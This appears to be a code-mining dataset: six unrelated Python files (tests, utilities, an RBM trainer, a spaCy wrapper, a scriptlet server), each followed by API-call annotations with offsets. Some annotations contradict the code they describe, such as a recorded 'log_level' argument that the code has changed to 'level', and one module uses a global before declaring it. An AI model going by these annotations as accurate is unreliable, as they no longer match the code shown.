[((649, 674), 'dpbench_datagen.pairwise_distance.gen_rand_data', 'gen_rand_data', (['nopt', 'dims'], {}), '(nopt, dims)\n', (662, 674), False, 'from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file\n'), ((799, 824), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (822, 824), False, 'import argparse\n'), ((1976, 2021), 'run_utils.run_command', 'utils.run_command', (['clean_string'], {'verbose': '(True)'}), '(clean_string, verbose=True)\n', (1993, 2021), True, 'import run_utils as utils\n'), ((2845, 2875), 'os.path.isfile', 'os.path.isfile', (['"""runtimes.csv"""'], {}), "('runtimes.csv')\n", (2859, 2875), False, 'import sys, os\n'), ((693, 715), 'numpy.empty', 'np.empty', (['(nopt, nopt)'], {}), '((nopt, nopt))\n', (701, 715), True, 'import numpy as np\n'), ((2088, 2133), 'run_utils.run_command', 'utils.run_command', (['build_string'], {'verbose': '(True)'}), '(build_string, verbose=True)\n', (2105, 2133), True, 'import run_utils as utils\n'), ((2231, 2276), 'run_utils.run_command', 'utils.run_command', (['build_string'], {'verbose': '(True)'}), '(build_string, verbose=True)\n', (2248, 2276), True, 'import run_utils as utils\n'), ((2387, 2422), 'dpbench_python.pairwise_distance.pairwise_distance_python.pairwise_distance_python', 'pairwise_distance_python', (['X', 'Y', 'p_D'], {}), '(X, Y, p_D)\n', (2411, 2422), False, 'from dpbench_python.pairwise_distance.pairwise_distance_python import pairwise_distance_python\n'), ((2452, 2480), 'dpbench_datagen.pairwise_distance.gen_data_to_file', 'gen_data_to_file', (['nopt', 'dims'], {}), '(nopt, dims)\n', (2468, 2480), False, 'from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file\n'), ((2572, 2612), 'run_utils.run_command', 'utils.run_command', (['run_cmd'], {'verbose': '(True)'}), '(run_cmd, verbose=True)\n', (2589, 2612), True, 'import run_utils as utils\n'), ((2712, 2733), 'numpy.allclose', 'np.allclose', (['n_D', 'p_D'], {}), '(n_D, p_D)\n', (2723, 
2733), True, 'import numpy as np\n'), ((2885, 2910), 'os.remove', 'os.remove', (['"""runtimes.csv"""'], {}), "('runtimes.csv')\n", (2894, 2910), False, 'import sys, os\n'), ((2948, 2976), 'dpbench_datagen.pairwise_distance.gen_data_to_file', 'gen_data_to_file', (['nopt', 'dims'], {}), '(nopt, dims)\n', (2964, 2976), False, 'from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file\n'), ((3068, 3108), 'run_utils.run_command', 'utils.run_command', (['run_cmd'], {'verbose': '(True)'}), '(run_cmd, verbose=True)\n', (3085, 3108), True, 'import run_utils as utils\n'), ((2659, 2679), 'numpy.fromfile', 'np.fromfile', (['"""D.bin"""'], {}), "('D.bin')\n", (2670, 2679), True, 'import numpy as np\n')]
|
import os
import time
from jme.stagecache.types import asset_types
from jme.stagecache.cache import Cache
from jme.stagecache.target import Target
from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata
import logging
# BUG FIX: basicConfig has no 'log_level' keyword - it raises
# ValueError("Unrecognised argument(s)") for unknown kwargs. The correct
# keyword is 'level'.
logging.basicConfig(level=logging.DEBUG)
def test_cache_md():
    """Exercise CacheMetadata: locking, asset bookkeeping and lock filtering.

    Uses a throw-away cache dir under test/ and real wall-clock timestamps.
    """
    test_dir = 'test/.cache.tmp'
    cache = Cache(test_dir)
    md = CacheMetadata(cache)
    print(md.write_lock)
    print(md.asset_list)
    # The cache root should be resolved under the current working directory.
    assert md.cache.cache_root.startswith(os.path.abspath(os.path.curdir))
    # clean up from earlier tests
    if os.path.exists(md.asset_list):
        os.remove(md.asset_list)
    if os.path.exists(md.write_lock):
        os.remove(md.write_lock)
    # Acquiring the write lock creates the lock file; releasing removes it.
    md.get_write_lock()
    assert os.path.exists(md.write_lock)
    md.release_write_lock()
    assert not os.path.exists(md.write_lock)
    t1 = Target('/some/path/1.txt', asset_types['file'])
    t2 = Target('/some/path/2.txt', asset_types['file'])
    tm1 = TargetMetadata(cache, t1.path_string, 'file')
    tm2 = TargetMetadata(cache, t2.path_string, 'file')
    # NOTE(review): the last argument appears to be a lock-expiry timestamp -
    # tm1 expires immediately (unlocked below), tm2 far in the future (locked).
    md.add_cached_file(tm1, 10, int(time.time()) + 0)
    md.add_cached_file(tm2, 20, int(time.time()) + 10000000)
    # Both entries listed; exactly one unlocked and one locked.
    cache_list = list(md.iter_cached_files())
    assert len(cache_list) == 2
    cache_list = list(md.iter_cached_files(locked=False))
    assert len(cache_list) == 1
    cache_list = list(md.iter_cached_files(locked=True))
    assert len(cache_list) == 1
    # Removing the unlocked entry leaves only the locked one behind.
    md.remove_cached_file(tm1)
    cache_list = list(md.iter_cached_files())
    assert len(cache_list) == 1
    cache_list = list(md.iter_cached_files(locked=False))
    assert len(cache_list) == 0
    cache_list = list(md.iter_cached_files(locked=True))
    assert len(cache_list) == 1
|
[
"os.path.abspath",
"os.remove",
"logging.basicConfig",
"jme.stagecache.text_metadata.TargetMetadata",
"os.path.exists",
"time.time",
"jme.stagecache.target.Target",
"jme.stagecache.cache.Cache",
"jme.stagecache.text_metadata.CacheMetadata"
] |
[((234, 278), 'logging.basicConfig', 'logging.basicConfig', ([], {'log_level': 'logging.DEBUG'}), '(log_level=logging.DEBUG)\n', (253, 278), False, 'import logging\n'), ((346, 361), 'jme.stagecache.cache.Cache', 'Cache', (['test_dir'], {}), '(test_dir)\n', (351, 361), False, 'from jme.stagecache.cache import Cache\n'), ((371, 391), 'jme.stagecache.text_metadata.CacheMetadata', 'CacheMetadata', (['cache'], {}), '(cache)\n', (384, 391), False, 'from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata\n'), ((560, 589), 'os.path.exists', 'os.path.exists', (['md.asset_list'], {}), '(md.asset_list)\n', (574, 589), False, 'import os\n'), ((631, 660), 'os.path.exists', 'os.path.exists', (['md.write_lock'], {}), '(md.write_lock)\n', (645, 660), False, 'import os\n'), ((731, 760), 'os.path.exists', 'os.path.exists', (['md.write_lock'], {}), '(md.write_lock)\n', (745, 760), False, 'import os\n'), ((849, 896), 'jme.stagecache.target.Target', 'Target', (['"""/some/path/1.txt"""', "asset_types['file']"], {}), "('/some/path/1.txt', asset_types['file'])\n", (855, 896), False, 'from jme.stagecache.target import Target\n'), ((906, 953), 'jme.stagecache.target.Target', 'Target', (['"""/some/path/2.txt"""', "asset_types['file']"], {}), "('/some/path/2.txt', asset_types['file'])\n", (912, 953), False, 'from jme.stagecache.target import Target\n'), ((964, 1009), 'jme.stagecache.text_metadata.TargetMetadata', 'TargetMetadata', (['cache', 't1.path_string', '"""file"""'], {}), "(cache, t1.path_string, 'file')\n", (978, 1009), False, 'from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata\n'), ((1020, 1065), 'jme.stagecache.text_metadata.TargetMetadata', 'TargetMetadata', (['cache', 't2.path_string', '"""file"""'], {}), "(cache, t2.path_string, 'file')\n", (1034, 1065), False, 'from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata\n'), ((485, 516), 'os.path.abspath', 'os.path.abspath', (['os.path.curdir'], {}), '(os.path.curdir)\n', (500, 516), 
False, 'import os\n'), ((599, 623), 'os.remove', 'os.remove', (['md.asset_list'], {}), '(md.asset_list)\n', (608, 623), False, 'import os\n'), ((670, 694), 'os.remove', 'os.remove', (['md.write_lock'], {}), '(md.write_lock)\n', (679, 694), False, 'import os\n'), ((804, 833), 'os.path.exists', 'os.path.exists', (['md.write_lock'], {}), '(md.write_lock)\n', (818, 833), False, 'import os\n'), ((1103, 1114), 'time.time', 'time.time', ([], {}), '()\n', (1112, 1114), False, 'import time\n'), ((1157, 1168), 'time.time', 'time.time', ([], {}), '()\n', (1166, 1168), False, 'import time\n')]
|
import os
import re
import uuid
import logging
from typing import Union, List
from enum import Enum, auto
class UserResponse(Enum):
    """Enum for user's response to a yes/no confirmation prompt."""
    YES = auto()
    NO = auto()

    def __eq__(self, other):
        """Compare by enum value; other classes never compare equal."""
        if self.__class__ is not other.__class__:
            return False
        return self.value == other.value

    # BUG FIX: defining __eq__ implicitly sets __hash__ to None, which made
    # members unhashable (unusable in sets / as dict keys). Restore Enum's
    # name-based hash so __eq__ and __hash__ stay consistent.
    __hash__ = Enum.__hash__
def setup_logger(name: str) -> logging.Logger:
    """Create a DEBUG-level logger with a formatted stream handler attached.

    Args:
        name (str): name of the logger.

    Returns:
        logging.Logger: configured, non-propagating logger instance.
    """
    stream_handler = logging.StreamHandler()
    stream_handler.setLevel(logging.DEBUG)
    stream_handler.setFormatter(logging.Formatter(
        '[%(levelname)s]: %(asctime)s - %(name)s: %(message)s'
    ))
    configured = logging.getLogger(name)
    configured.setLevel(logging.DEBUG)
    configured.addHandler(stream_handler)
    # Keep records out of ancestor loggers to avoid duplicate output.
    configured.propagate = False
    return configured
def _atoi(text: str) -> Union[int, str]:
"""Convert ascii to integer.
Args:
text (str): string.
Returns:
Union[int, str]: integer if number, string otherwise.
"""
return int(text) if text.isdigit() else text
def natural_keys(text: str) -> Union[List[int], List[str]]:
    """Sort key implementing natural ("human") ordering.

    Splits *text* into alternating non-digit and digit runs, converting the
    digit runs to integers so that e.g. 'x2' sorts before 'x10'.

    Args:
        text (str): string to derive the key from.

    Returns:
        Union[List[int], List[str]]: mixed list of strings and integers.
    """
    # The digit-conversion helper is inlined here so the key is self-contained.
    return [int(token) if token.isdigit() else token
            for token in re.split(r'(\d+)', text)]
def show_info(obj: object, logger: logging.Logger) -> None:
    """Log every instance attribute of *obj*, aligned on the longest name.

    Args:
        obj (object): instance whose __dict__ is reported.
        logger (logging.Logger): destination logger (INFO level).
    """
    width = max(len(attr) for attr in obj.__dict__)
    for attr in sorted(obj.__dict__):
        logger.info(f'{attr: <{width}} -> {obj.__dict__[attr]}')
def gen_random_filename(directory_name: str, extension: str) -> str:
"""Generate random filename in given directory.
Args:
directory_name (str): directory name.
extension (str): extension includes dot.
Returns:
path (str): random filename(absolute path).
"""
path = ''
while True:
random_filename = f'{uuid.uuid4().hex}{extension}'
path = os.path.join(directory_name, random_filename)
if os.path.exists(path):
continue
break
return path
def append_prefix(targets: Union[str, list[str], tuple[str]], prefix: str) -> tuple[str]:
"""Append prefix to targets.
Args:
targets (Union[str, list[str], tuple[str]]): target to add prefix.
prefix (str): string prefix.
Returns:
tuple[str]: tuple of string with prefix added
"""
if isinstance(targets, str):
return (prefix + targets,)
elif isinstance(targets, list) or isinstance(targets, tuple):
targets_prefix_added = []
for target in targets:
targets_prefix_added.append(prefix + target)
return tuple(targets_prefix_added)
def enumerate_with_step(elements, initial_number=0, step=1):
"""Enumerate with step.
Args:
elements (list): Elements.
initial_number (int, optional): Initial number. Defaults to 0.
step (int, optional): Step number. Defaults to 1.
Yields:
(key, value): Counted number and the value.
"""
for element in elements:
yield (initial_number, element)
initial_number += step
def ask() -> UserResponse:
"""Ask user to select yes or no.
This will continue forever until keyboard-interrupt occurres or the user inputs "Yes" or "No".
Returns:
UserResponse: User's response(Yes or No)
"""
user_input = ''
while not re.search(r'^[ynYN].*$', user_input):
user_input = input('Are you sure to execute?(y/n): ')
if re.search(r'^[yY].*$', user_input):
return UserResponse.YES
else:
return UserResponse.NO
|
[
"uuid.uuid4",
"re.split",
"os.path.join",
"logging.StreamHandler",
"os.path.exists",
"logging.Formatter",
"enum.auto",
"re.search",
"logging.getLogger"
] |
[((201, 207), 'enum.auto', 'auto', ([], {}), '()\n', (205, 207), False, 'from enum import Enum, auto\n'), ((217, 223), 'enum.auto', 'auto', ([], {}), '()\n', (221, 223), False, 'from enum import Enum, auto\n'), ((617, 640), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (634, 640), False, 'import logging\n'), ((691, 714), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (712, 714), False, 'import logging\n'), ((772, 845), 'logging.Formatter', 'logging.Formatter', (['"""[%(levelname)s]: %(asctime)s - %(name)s: %(message)s"""'], {}), "('[%(levelname)s]: %(asctime)s - %(name)s: %(message)s')\n", (789, 845), False, 'import logging\n'), ((3800, 3833), 're.search', 're.search', (['"""^[yY].*$"""', 'user_input'], {}), "('^[yY].*$', user_input)\n", (3809, 3833), False, 'import re\n'), ((2228, 2273), 'os.path.join', 'os.path.join', (['directory_name', 'random_filename'], {}), '(directory_name, random_filename)\n', (2240, 2273), False, 'import os\n'), ((2285, 2305), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2299, 2305), False, 'import os\n'), ((3692, 3727), 're.search', 're.search', (['"""^[ynYN].*$"""', 'user_input'], {}), "('^[ynYN].*$', user_input)\n", (3701, 3727), False, 'import re\n'), ((1485, 1509), 're.split', 're.split', (['"""(\\\\d+)"""', 'text'], {}), "('(\\\\d+)', text)\n", (1493, 1509), False, 'import re\n'), ((2183, 2195), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2193, 2195), False, 'import uuid\n')]
|
import numpy as np
import matplotlib.pyplot as plt
from rbm import RBM
import click
import gzip
import pickle
@click.group(context_settings={"help_option_names": ['-h', '--help']})
def cli():
"""Simple tool for training an RBM"""
pass
# @click.option('--target-path', type=click.Path(exists=True),
# help="path to the wavefunction data")
@cli.command("train")
@click.option('--train-path', default='../data/Ising2d_L4.pkl.gz',
show_default=True, type=click.Path(exists=True),
help="path to the training data")
@click.option('--save', type=click.Path(),
help="where to save the trained RBM parameters (if at all)")
@click.option('-n', '--num-hidden', default=None, type=int,
help=("number of hidden units in the RBM; defaults to "
"number of visible units"))
@click.option('-e', '--epochs', default=1000, show_default=True, type=int)
@click.option('-b', '--batch-size', default=100, show_default=True, type=int)
@click.option('-k', default=1, show_default=True, type=int,
help="number of Contrastive Divergence steps")
@click.option('-l', '--learning-rate', default=1e-3,
show_default=True, type=float)
@click.option('-m', '--momentum', default=0.5, show_default=True, type=float,
help=("value of the momentum parameter; ignored if "
"using SGD or Adam optimization"))
@click.option('--l1', default=0, show_default=True, type=float,
help="L1 regularization parameter")
@click.option('--l2', default=0, show_default=True, type=float,
help="L2 regularization parameter")
@click.option('--log-every', default=0, show_default=True, type=int,
help=("how often the validation statistics are recorded, "
"in epochs; 0 means no logging"))
@click.option('--seed', default=1234, show_default=True, type=int,
help="random seed to initialize the RBM with")
@click.option('-p', '--persistent', is_flag=True,
help="use Persistent Contrastive Divergence (PCD)")
@click.option('--persist-from', default=0, show_default=True, type=int,
help=("if PCD flag is given, use vanilla CD until the given "
"epoch, then switch to PCD"))
@click.option('--plot', is_flag=True)
@click.option('--no-prog', is_flag=True)
@click.option('--method', default='momentum', show_default=True,
type=click.Choice(["nesterov", "momentum", "sgd", "adam"]),
help="the optimization method to use")
def train(train_path, save, num_hidden, epochs, batch_size,
k, persistent, persist_from, learning_rate, momentum, l1, l2,
method, seed, log_every, plot, no_prog):
"""Train an RBM"""
# train_set = np.loadtxt(train_path)
# target_psi = np.loadtxt(target_path) if target_path is not None else None
with gzip.open(train_path) as f:
train_set = pickle.load(f, encoding='bytes')
num_hidden = train_set.shape[-1] if num_hidden is None else num_hidden
rbm = RBM(num_visible=train_set.shape[-1],
num_hidden=num_hidden,
seed=seed)
# learning_rate = schedulers.bounded_exponential_decay(0.1, 1e-6, epochs)
# momentum = schedulers.bounded_exponential_decay(0.5, 0.99, epochs)
nll_list = rbm.train(train_set, None, epochs,
batch_size, k=k,
persistent=persistent,
persist_from=persist_from,
lr=learning_rate,
momentum=momentum,
l1_reg=l1, l2_reg=l2,
beta1=0.9, beta2=0.999, epsilon=1e-8,
method=method,
log_every=log_every,
progbar=(not no_prog))
if save:
rbm.save(save)
if plot and nll_list:
fig, ax1 = plt.subplots(figsize=(10, 10))
ax1.plot(log_every * np.arange(len(nll_list)),
np.array(nll_list) / len(train_set), 'b')
ax1.set_xlabel("Epoch")
ax1.set_ylabel("NLL per training example", color='b')
ax1.tick_params('y', colors='b')
ax1.set_xlim(0, epochs)
if persistent and persist_from > 0:
# mark starting point of PCD if enabled and not zero
ax1.axvline(x=persist_from, linestyle=':', color='g')
# ax2 = ax1.twinx()
# ax2.plot(log_every * np.arange(len(overlap_list)),
# overlap_list, 'r')
# ax2.set_ylabel('Overlap', color='r')
# ax2.tick_params('y', colors='r')
# ax2.axhline(y=1, xmin=0, xmax=len(overlap_list),
# linestyle=':', color='r') # plot maximum overlap
plt.show()
# @cli.command("test")
# @click.option('--train-path', default='../c++/training_data.txt',
# show_default=True)
# @click.option('--target-path', default='../c++/target_psi.txt',
# show_default=True)
# @click.option('-n', '--num-hidden', default=None, type=int,
# help=("number of hidden units in the RBM; defaults to "
# "number of visible units"))
# @click.option('-k', default=1, show_default=True, type=int,
# help="number of Contrastive Divergence steps")
# @click.option('-e', '--epsilon', default=1e-8, show_default=True, type=float)
# @click.option('--seed', default=1234, show_default=True, type=int,
# help="random seed to initialize the RBM with")
# def test(train_path, target_path, num_hidden, k, epsilon, seed):
# """Tests the RBM's gradient computations"""
# train_set = np.loadtxt(train_path)
# target_psi = np.loadtxt(target_path)
# num_hidden = train_set.shape[-1] if num_hidden is None else num_hidden
# rbm = RBM(num_visible=train_set.shape[-1],
# num_hidden=num_hidden,
# seed=seed)
# rbm.test_gradients(train_set, target_psi, k, epsilon)
if __name__ == '__main__':
cli()
|
[
"gzip.open",
"matplotlib.pyplot.show",
"click.option",
"click.Choice",
"pickle.load",
"numpy.array",
"click.Path",
"rbm.RBM",
"click.group",
"matplotlib.pyplot.subplots"
] |
[((113, 182), 'click.group', 'click.group', ([], {'context_settings': "{'help_option_names': ['-h', '--help']}"}), "(context_settings={'help_option_names': ['-h', '--help']})\n", (124, 182), False, 'import click\n'), ((684, 826), 'click.option', 'click.option', (['"""-n"""', '"""--num-hidden"""'], {'default': 'None', 'type': 'int', 'help': '"""number of hidden units in the RBM; defaults to number of visible units"""'}), "('-n', '--num-hidden', default=None, type=int, help=\n 'number of hidden units in the RBM; defaults to number of visible units')\n", (696, 826), False, 'import click\n'), ((862, 935), 'click.option', 'click.option', (['"""-e"""', '"""--epochs"""'], {'default': '(1000)', 'show_default': '(True)', 'type': 'int'}), "('-e', '--epochs', default=1000, show_default=True, type=int)\n", (874, 935), False, 'import click\n'), ((937, 1013), 'click.option', 'click.option', (['"""-b"""', '"""--batch-size"""'], {'default': '(100)', 'show_default': '(True)', 'type': 'int'}), "('-b', '--batch-size', default=100, show_default=True, type=int)\n", (949, 1013), False, 'import click\n'), ((1015, 1125), 'click.option', 'click.option', (['"""-k"""'], {'default': '(1)', 'show_default': '(True)', 'type': 'int', 'help': '"""number of Contrastive Divergence steps"""'}), "('-k', default=1, show_default=True, type=int, help=\n 'number of Contrastive Divergence steps')\n", (1027, 1125), False, 'import click\n'), ((1136, 1223), 'click.option', 'click.option', (['"""-l"""', '"""--learning-rate"""'], {'default': '(0.001)', 'show_default': '(True)', 'type': 'float'}), "('-l', '--learning-rate', default=0.001, show_default=True,\n type=float)\n", (1148, 1223), False, 'import click\n'), ((1234, 1407), 'click.option', 'click.option', (['"""-m"""', '"""--momentum"""'], {'default': '(0.5)', 'show_default': '(True)', 'type': 'float', 'help': '"""value of the momentum parameter; ignored if using SGD or Adam optimization"""'}), "('-m', '--momentum', default=0.5, show_default=True, 
type=float,\n help=\n 'value of the momentum parameter; ignored if using SGD or Adam optimization'\n )\n", (1246, 1407), False, 'import click\n'), ((1434, 1537), 'click.option', 'click.option', (['"""--l1"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'float', 'help': '"""L1 regularization parameter"""'}), "('--l1', default=0, show_default=True, type=float, help=\n 'L1 regularization parameter')\n", (1446, 1537), False, 'import click\n'), ((1548, 1651), 'click.option', 'click.option', (['"""--l2"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'float', 'help': '"""L2 regularization parameter"""'}), "('--l2', default=0, show_default=True, type=float, help=\n 'L2 regularization parameter')\n", (1560, 1651), False, 'import click\n'), ((1662, 1827), 'click.option', 'click.option', (['"""--log-every"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'int', 'help': '"""how often the validation statistics are recorded, in epochs; 0 means no logging"""'}), "('--log-every', default=0, show_default=True, type=int, help=\n 'how often the validation statistics are recorded, in epochs; 0 means no logging'\n )\n", (1674, 1827), False, 'import click\n'), ((1858, 1975), 'click.option', 'click.option', (['"""--seed"""'], {'default': '(1234)', 'show_default': '(True)', 'type': 'int', 'help': '"""random seed to initialize the RBM with"""'}), "('--seed', default=1234, show_default=True, type=int, help=\n 'random seed to initialize the RBM with')\n", (1870, 1975), False, 'import click\n'), ((1986, 2091), 'click.option', 'click.option', (['"""-p"""', '"""--persistent"""'], {'is_flag': '(True)', 'help': '"""use Persistent Contrastive Divergence (PCD)"""'}), "('-p', '--persistent', is_flag=True, help=\n 'use Persistent Contrastive Divergence (PCD)')\n", (1998, 2091), False, 'import click\n'), ((2102, 2274), 'click.option', 'click.option', (['"""--persist-from"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'int', 'help': '"""if PCD flag is given, 
use vanilla CD until the given epoch, then switch to PCD"""'}), "('--persist-from', default=0, show_default=True, type=int, help\n =\n 'if PCD flag is given, use vanilla CD until the given epoch, then switch to PCD'\n )\n", (2114, 2274), False, 'import click\n'), ((2300, 2336), 'click.option', 'click.option', (['"""--plot"""'], {'is_flag': '(True)'}), "('--plot', is_flag=True)\n", (2312, 2336), False, 'import click\n'), ((2338, 2377), 'click.option', 'click.option', (['"""--no-prog"""'], {'is_flag': '(True)'}), "('--no-prog', is_flag=True)\n", (2350, 2377), False, 'import click\n'), ((3074, 3144), 'rbm.RBM', 'RBM', ([], {'num_visible': 'train_set.shape[-1]', 'num_hidden': 'num_hidden', 'seed': 'seed'}), '(num_visible=train_set.shape[-1], num_hidden=num_hidden, seed=seed)\n', (3077, 3144), False, 'from rbm import RBM\n'), ((2906, 2927), 'gzip.open', 'gzip.open', (['train_path'], {}), '(train_path)\n', (2915, 2927), False, 'import gzip\n'), ((2954, 2986), 'pickle.load', 'pickle.load', (['f'], {'encoding': '"""bytes"""'}), "(f, encoding='bytes')\n", (2965, 2986), False, 'import pickle\n'), ((3932, 3962), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (3944, 3962), True, 'import matplotlib.pyplot as plt\n'), ((4778, 4788), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4786, 4788), True, 'import matplotlib.pyplot as plt\n'), ((492, 515), 'click.Path', 'click.Path', ([], {'exists': '(True)'}), '(exists=True)\n', (502, 515), False, 'import click\n'), ((594, 606), 'click.Path', 'click.Path', ([], {}), '()\n', (604, 606), False, 'import click\n'), ((2462, 2515), 'click.Choice', 'click.Choice', (["['nesterov', 'momentum', 'sgd', 'adam']"], {}), "(['nesterov', 'momentum', 'sgd', 'adam'])\n", (2474, 2515), False, 'import click\n'), ((4035, 4053), 'numpy.array', 'np.array', (['nll_list'], {}), '(nll_list)\n', (4043, 4053), True, 'import numpy as np\n')]
|
import logging
import os
import tempfile
from pathlib import Path
from uuid import uuid1
from py_profiler import profiler, profiling_service
from .command_line import run_command_line
from .utils import convert_to_spacy_doc_file
@profiler("train_spacy_model")
def train_spacy_model(
config_file: str,
vector_file: str,
train_file: str,
dev_file: str,
output_folder: str
):
with tempfile.TemporaryDirectory() as temp_dir:
tmp_train_file = f'{temp_dir}/{uuid1()}.spacy'
tmp_dev_file = f'{temp_dir}/{uuid1()}.spacy'
tmp_train_file = convert_to_spacy_doc_file(
train_file,
tmp_train_file,
dataset_size=None,
case_insensitive=True,
remove_accent=False
)
tmp_dev_file = convert_to_spacy_doc_file(
dev_file,
tmp_dev_file,
dataset_size=None,
case_insensitive=True,
remove_accent=False
)
run_command_line([
'python3',
'-m',
'spacy',
'train',
config_file,
'--output',
output_folder,
'--paths.train', tmp_train_file,
'--paths.dev', tmp_dev_file,
'--paths.vectors', vector_file
])
logging.info(profiling_service.as_table())
logging.info(f'Output model: {output_folder}')
|
[
"tempfile.TemporaryDirectory",
"py_profiler.profiler",
"py_profiler.profiling_service.as_table",
"logging.info",
"uuid.uuid1"
] |
[((234, 263), 'py_profiler.profiler', 'profiler', (['"""train_spacy_model"""'], {}), "('train_spacy_model')\n", (242, 263), False, 'from py_profiler import profiler, profiling_service\n'), ((1376, 1422), 'logging.info', 'logging.info', (['f"""Output model: {output_folder}"""'], {}), "(f'Output model: {output_folder}')\n", (1388, 1422), False, 'import logging\n'), ((427, 456), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (454, 456), False, 'import tempfile\n'), ((1342, 1370), 'py_profiler.profiling_service.as_table', 'profiling_service.as_table', ([], {}), '()\n', (1368, 1370), False, 'from py_profiler import profiler, profiling_service\n'), ((509, 516), 'uuid.uuid1', 'uuid1', ([], {}), '()\n', (514, 516), False, 'from uuid import uuid1\n'), ((562, 569), 'uuid.uuid1', 'uuid1', ([], {}), '()\n', (567, 569), False, 'from uuid import uuid1\n')]
|
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To see moto-server logs
# pytest -s -p no:logging tests/test_aio_s3fs.py
import pytest
@pytest.mark.asyncio
async def test_pandas_s3_io(
aio_s3_bucket, aio_s3fs
):
import numpy as np
import pandas as pd
s3_file = f"s3://{aio_s3_bucket}/data.csv"
print(s3_file)
data = {"1": np.random.rand(5)}
df = pd.DataFrame(data=data)
df.to_csv(s3_file)
s3_df = pd.read_csv(s3_file, index_col=0)
assert isinstance(s3_df, pd.DataFrame)
pd.testing.assert_frame_equal(df, s3_df)
@pytest.mark.asyncio
async def test_zarr_s3_io(
aio_s3_bucket, aio_s3fs
):
import numpy as np
import pandas as pd
import s3fs
import xarray as xr
fmap = s3fs.S3Map(f"s3://{aio_s3_bucket}/test_datasets/test.zarr", s3=s3fs.S3FileSystem())
print(fmap.root)
ds = xr.Dataset(
{"foo": (("x", "y"), np.random.rand(4, 5))},
coords={
"x": [10, 20, 30, 40],
"y": pd.date_range("2000-01-01", periods=5),
"z": ("x", list("abcd")),
},
)
ds.to_zarr(fmap, consolidated=True)
s3_ds = xr.open_zarr(fmap, consolidated=True)
assert isinstance(s3_ds, xr.Dataset)
xr.testing.assert_equal(ds, s3_ds)
|
[
"pandas.DataFrame",
"pandas.testing.assert_frame_equal",
"xarray.testing.assert_equal",
"pandas.date_range",
"pandas.read_csv",
"s3fs.S3FileSystem",
"xarray.open_zarr",
"numpy.random.rand"
] |
[((902, 925), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data'}), '(data=data)\n', (914, 925), True, 'import pandas as pd\n'), ((961, 994), 'pandas.read_csv', 'pd.read_csv', (['s3_file'], {'index_col': '(0)'}), '(s3_file, index_col=0)\n', (972, 994), True, 'import pandas as pd\n'), ((1042, 1082), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['df', 's3_df'], {}), '(df, s3_df)\n', (1071, 1082), True, 'import pandas as pd\n'), ((1658, 1695), 'xarray.open_zarr', 'xr.open_zarr', (['fmap'], {'consolidated': '(True)'}), '(fmap, consolidated=True)\n', (1670, 1695), True, 'import xarray as xr\n'), ((1741, 1775), 'xarray.testing.assert_equal', 'xr.testing.assert_equal', (['ds', 's3_ds'], {}), '(ds, s3_ds)\n', (1764, 1775), True, 'import xarray as xr\n'), ((874, 891), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (888, 891), True, 'import numpy as np\n'), ((1326, 1345), 's3fs.S3FileSystem', 's3fs.S3FileSystem', ([], {}), '()\n', (1343, 1345), False, 'import s3fs\n'), ((1418, 1438), 'numpy.random.rand', 'np.random.rand', (['(4)', '(5)'], {}), '(4, 5)\n', (1432, 1438), True, 'import numpy as np\n'), ((1511, 1549), 'pandas.date_range', 'pd.date_range', (['"""2000-01-01"""'], {'periods': '(5)'}), "('2000-01-01', periods=5)\n", (1524, 1549), True, 'import pandas as pd\n')]
|
# =============================================================================
# render_scriptlets.py
#
# This file handles serving the sample scripts.
#
# December 2015
#
# Copyright (c) 2015 by cisco Systems, Inc.
# All rights reserved.
# =============================================================================
import json, os, re
from collections import OrderedDict
from m2m_demo.frontend import RegisterPage, BaseResource
scriptlets = None
def get_scriptlet_names(cfg):
maybe_load_scriptlets(cfg)
return scriptlets.keys()
def maybe_load_scriptlets(cfg):
if scriptlets is not None:
return
global scriptlets
scriptlets = OrderedDict()
scriptlet_dir = os.path.join(cfg['assets'], 'scriptlets')
for root, dirs, files in os.walk(scriptlet_dir):
for filename in files:
contents = open(os.path.join(root, filename)).read()
m = re.search('_(.*)\.py', filename)
if m:
filename = m.group(1)
scriptlets[filename] = contents
class ScriptletsPage(BaseResource):
"""
Serve up scriptlets as a json object
"""
def render_GET(self, request):
request.setHeader('Content-Type', 'application/json')
maybe_load_scriptlets(self.cfg)
return json.dumps(scriptlets)
page = RegisterPage(ScriptletsPage, '/scriptlets')
|
[
"os.walk",
"m2m_demo.frontend.RegisterPage",
"json.dumps",
"re.search",
"collections.OrderedDict",
"os.path.join"
] |
